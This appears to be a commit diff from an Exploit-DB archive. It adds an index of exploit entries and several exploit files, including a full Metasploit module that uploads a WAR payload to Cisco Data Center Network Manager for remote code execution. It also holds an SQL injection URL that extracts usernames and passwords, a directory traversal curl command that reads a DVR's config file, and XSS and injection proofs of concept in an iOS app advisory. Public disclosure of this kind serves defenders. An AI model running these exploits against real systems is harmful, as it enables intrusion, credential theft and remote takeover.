29923,platforms/php/webapps/29923.txt,"IP Board 3.4.6 - Stored XSS",2013-11-30,"Ciaran McNally",php,webapps,0
29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - CSRF Vulnerability",2013-11-30,"mohammed al-saggaf",hardware,webapps,0
29925,platforms/php/webapps/29925.txt,"Kleeja Upload Center Script - CRLF Injection",2013-11-30,"terminator ashiyane",php,webapps,0
29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) - Crash POC",2013-11-30,"Akin Tosunlar",windows,dos,0
29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) - Crash PoC",2013-11-30,"Akin Tosunlar",windows,dos,0
29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta, Inc. DPR2320R2 - Multiple CSRF vulnerability",2013-11-30,sajith,hardware,webapps,0
29928,platforms/windows/local/29928.c,"BZR Player 0.97 (codec_mpeg.dll) - DLL Hijacking Vulnerability",2013-11-30,"Akin Tosunlar",windows,local,0
29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 BRY.ASP SQL Injection Vulnerability",2007-04-26,RMx,asp,webapps,0
@ -26896,7 +26887,7 @@ id,file,description,date,author,platform,type,port
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash POC",2013-11-30,KAI,windows,dos,0
29935,platforms/php/webapps/29935.php,"MyBB Exploit",2013-11-30,BlackDream,php,webapps,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
29936,platforms/windows/local/29936.c,"Hex Workshop 6.7 (mfc100trk.dll) - DLL Hijacking (0-day)",2013-12-01,"Akin Tosunlar",windows,local,0
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
@ -26908,8 +26899,67 @@ id,file,description,date,author,platform,type,port
29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0
29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability",2007-05-03,"Tim Brown",hardware,remote,0
29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0
29947,platforms/php/webapps/29947.txt,"Joomla com_alphauserpoints Remote Code Execution",2013-12-01,DevilScreaM,php,webapps,0
29948,platforms/php/webapps/29948.txt,"Joomla com_alphacontent Remote Code Execution",2013-12-01,DevilScreaM,php,webapps,0
29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0
29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0
29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0
29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0
29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0
29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0
29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.PHP SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0
29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0
29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0
29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 PID Parameter SQL Injection Vulnerability",2007-05-07,"ilker Kandemir",asp,webapps,0
29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 ArticleComment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 ArticleData.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 ArticleImage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 ArticleIndex.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 ArticlePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 ArticleTopic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 ArticleType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 Image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 Issue.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 IssuePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 Language.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 Log.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 LoginAttempts.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 Publication.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 Section.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 Topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30000,platforms/hardware/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,hardware,webapps,0
30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection Vulnerability",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0
30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe Remote Code Execution",2013-12-03,metasploit,windows,remote,12221
30010,platforms/php/remote/30010.rb,"Kimai v0.9.2 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80
30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80

Can't render this file because it is too large.

9
platforms/asp/webapps/29958.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23850/info
fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
fipsCMS 2.1 and prior versions are vulnerable to this issue.
http://www.example.com/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/

9
platforms/cgi/webapps/29962.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23862/info
OTRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects OTRS 2.0.4; other versions may also be affected.
http://www.example.com/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss]

0
platforms/php/webapps/28283.txt → platforms/hardware/webapps/28283.txt
View file

47
platforms/hardware/webapps/29959.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: TVT TD-2308SS-B DVR directory traversal
# Shodan Dork: "Cross Web Server"
# Date: 01 Dec 2013
# Disclosure date: 10 Sep 2013
# Exploit Author: Cesar Neira
# Vendor Homepage: http://en.tvt.net.cn/
# Affected Firmware Versions:
3.1.43.B
3.1.43.P
3.1.6.P-1.0.2.1-03
3.1.75.B-1.0.2.1-00
3.1.7.B-1.0.2.1-00
3.1.81.B-1.0.2.1-00
3.1.83.B-1.0.2.1-00
3.1.83.P-1.0.4.2-03
3.1.87.P-1.0.4.2-17
3.1.91.P-1.0.2.1-03
3.1.92.P-1.0.2.1-00
3.1.93.B-1.0.2.1-17
3.2.0.B-1.0.2.1-17
3.2.0.P-1.0.2.1-03
3.2.0.P-1.0.2.1-17
3.2.0.P-1.0.6.0.32-00
3.2.0.P-3520A-00
3.2.0.P-3520A-03
3.2.0.P-3531-00
3.2.0.P-3531-11
3.2.0.P-FH-00
3.2.9.P-3520A-06
maybe others.
# Tested on: TVT DVR TD-2308SS-B
# CVE : CVE-2013-6023
# References:
http://www.kb.cert.org/vuls/id/785838
http://alguienenlafisi.blogspot.com/2013/10/dvr-tvt-directory-traversal.html
POC:
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
--
Cesar Neira <csar.1603@gmail.com>
http://alguienenlafisi.blogspot.com
Root-Node
Exploit: http://www.exploit-db.com/sploits/29959.nse

313
platforms/hardware/webapps/30000.txt Executable file
View file

@ -0,0 +1,313 @@
Document Title:
===============
Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1153
Release Date:
=============
2013-12-02
Vulnerability Laboratory ID (VL-ID):
====================================
1153
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
nsfer WiFi app is a straight and effortless way to transfer your photos and videos between iPhones, iPads
and computers. Forget about hassle with transferring your media via iTunes, iCloud. Features:
- Send photos and videos from iPhone or iPod Touch to other iPhone with a simple drag and drop
- Transfer media from your PC or Mac to iPhone or iPod Touch
- Download photos and videos to your Computer from iPhone, iPod Touch, iPad and iPad Mini
- Copy photos and videos from Computer to iPad or iPad Mini
- Import HD videos to iPad or iPad Mini from iPhone
- Exchange photos and videos between iPads over your local WiFi network
- Make your pictures accessible from your iPhone or iPod Touch to other users on the same WiFi network
- Share you media files on iPad or iPad Mini
- Browse photos and videos shared on iDevices from any PC or Mac
- Download shared media to your Computer
- Receive photos and videos to iPhone or iPod Touch from iPad
- Preview shared photos and videos in any browser
- Use browser to download shared photos and videos from iDevices
- Send photos and videos from any browser to your iPhone or iPad
(Copy of the Homepage: https://itunes.apple.com/en/app/photo-transfer-wifi-quickly/id674978018 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Photo Transfer WiFi v1.4.4 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Simplex Solutions Inc
Product: Photo Transfer WiFi 1.4.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
2 local command/path injection web vulnerabilities has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs in 2 different section with
persistent attack vector. The first section is the wifi app interface login were the application is listed. The secound execute
occurs after the login in the smallheader interface section.The security risk of the command/path inject vulnerabilities are
estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.2(+)|(-)7.3.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Photo Transfer Wifi v1.4.4
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Login - Device Name
[+] Index - Device Name
1.2
A persistent input validation web vulnerability has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.
The validation web vulnerability allows remote attackers to inject own malicious script codes by a persistent (application-side) attack vector.
The persistent input validation vulnerability is located in the album name value of the mobile application. Remote attackers and local low
privileged user accounts can inject own malicious persistent script codes as album name. The execute occurs in the main index album name list
and the sub category list. By exchange of the information the issue can be exploited by remote attackers by a low user interaction sync.
The security risk of the persistent vulnerabilities are estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.6(+).
Exploitation of the persistent web vulnerability requires no or a local low privileged mobile application account and low user interaction.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent module context manipulation.
Vulnerable Application(s):
[+] Photo Transfer Wifi v1.4.4
Vulnerable Parameter(s):
[+] albumname
Affected Module(s):
[+] Index - Album Name List
Proof of Concept (PoC):
=======================
1.1
The local command/path inject web vulnerability via devicename value can be exploited by local low privileged or restricted device
user accounts & no user interaction. For security demonstration or to reproduce the command/path mobile app vulnerability follow
the provided information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the photo transfer wifi iOS mobile application
2. Open the iOS settings and switch to the info > device name input
3. Include your name and the payload to execute an app command or request a local device path (">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">)
4. Save the input and open the photo transfer wifi app
Note: After the startup the web-server is available
5. Open the url following url to the web interface of the mobile application (http://localhost:8080)
6. The first execute occurs in the error message with the devicename value of the login
7. Successful reproduce of the first vulnerability done ... let us watch now the secound issue of the devicename after the login
8. Exclude in the iOS device settings the payload, save and open the service via web-server http request
9. Login to the interface with the default username
10. The execute of the command or path request occurs after the login in the devicename value
11. Successful reproduce of the secound vulnerability done!
PoC: Login > devicepreview - devicename
<div class="errormessage">
Invalid password. Try again!
</div>
<div class="youconnect">
You are now connecting to
</div>
<div class="devicepreview">
<div class="devicepreviewInternal">
<p class="devicename">
device bkm>"<<>"<x src="login_incorrect_files/">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">
</p>
<div class='deviceico'>
<img src="/devices_ico/iPadB.png">
</div>
</div>
</div>
<form method="POST" action="/login">
<div class='forminputs'>
<input type="password" name="password" class='passinput' placeholder='Enter Password' id="login_input">
<input type="submit" value="Connect" class='passsubmit'>
</div>
</form>
Note: The injected command or path request execute occurs in the login and error message module.
PoC: Index - smallheader > devicename
<body>
<div class="smallheader">
<img src="web/logo_small.png" style="float:left">
<div class="devicepreview" style="float:right">
<div class="devicepreviewInternal">
<p class="devicename">
device bkm ">%20<x src=\..\<../var/mobile/Library/[APP PATH]/>
</p>
<div class="deviceico">
<img src="/devices_ico/iPadB.png">
</div>
</div>
</div>
</div>
Note: The secound inject/execute is located after the login in the `smallheader` class were the devicename will be visible.
Reference(s):
http://localhost:8080/
1.2
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged web-application user account
and low user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Install the photo transfer wifi mobile app
2. Open the iOS photo app (default software)
3. Add a new album and inject into the album name your own script code (payload)
4. Open the photo transfer wifi mobile app
5. Go to the local web-server url (localhost:8080)
Note: After the login to the interface the index displays an album name listing
6. The script code execute occurs with persistent attack vector in the index album name list context
7. Successful reproduce of the vulnerability done!
PoC: Gallery > Album - albumtitle
<div class="albumtitle">
<><[PERSISTENT INJECTED SCRIPT CODE IN ALBUM NAME VALUE VIA POST METHOD INJECT!]>
</div>
<div class="albumsize">
3 Items
</div>
</a><div class="ziploaddiv"><a href="http://localhost:8080/gallery/album/?albumtitle=WallpapersHD&
album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-3A67-4BFA-AF16-04CC8DE2CD29&partial=0" class="interceptme">
</a><a href="http://192.168.2.106:8080/gallery/zip_album/WallpapersHD.zip?album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-
3A67-4BFA-AF16-04CC8DE2CD29" class="zipload" target="_blank">
<img src="localhost8080_files/download.png" class="ziploadimg" width="36px">
</a>
<div class="ziploadtext">
</div>
</div>
</div>
Note: The issue can be exploited by local privileged user accounts in the iOS photo app (default) or by a remote attacker via album to file sync.
(interceptme!? ;)
Reference(s):
http://localhost:8080/gallery/album/?albumtitle=[ALBUM-NAME]
Solution - Fix & Patch:
=======================
1.1
The command/path inject web vulnerabilities can be patched by a secure encode and parse of the devicename value.
Parse the devicename in the login section and in the smallheader class to devicename.
1.2
The persistent input validation web vulnerability can be patched by a secure parse and encode of the album name value.
All GET requests with the value and the input by sync needs to be filtered by a secure mechanism.
Security Risk:
==============
1.1
The security risk of the local command/path inject web vulnerabilities are estimated as high.
1.2
The security risk of the persistent album name web vulnerability is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

153
platforms/java/remote/30008.rb Executable file
View file

@ -0,0 +1,153 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#{filename}%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end

1
platforms/java/webapps/29918.txt
View file

@ -3,6 +3,7 @@ Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability
Vendor: Anyware Services
Product web page: http://www.ametys.org
Download: http://www.ametys.org/en/download/ametys-cms.html
Affected version: 3.5.2 and 3.5.1
Summary: Ametys is a Java-based open source CMS combining

29
platforms/linux/dos/29920.py
View file

@ -1,3 +1,32 @@
# Exploit Title: Up.Time Agent 5.0.1 Stack Overflow
# Date: 28/11/2013
# Exploit Author: Denis Andzakovic
# Vendor Homepage: http://www.uptimesoftware.com/
# Version: 5.0.1
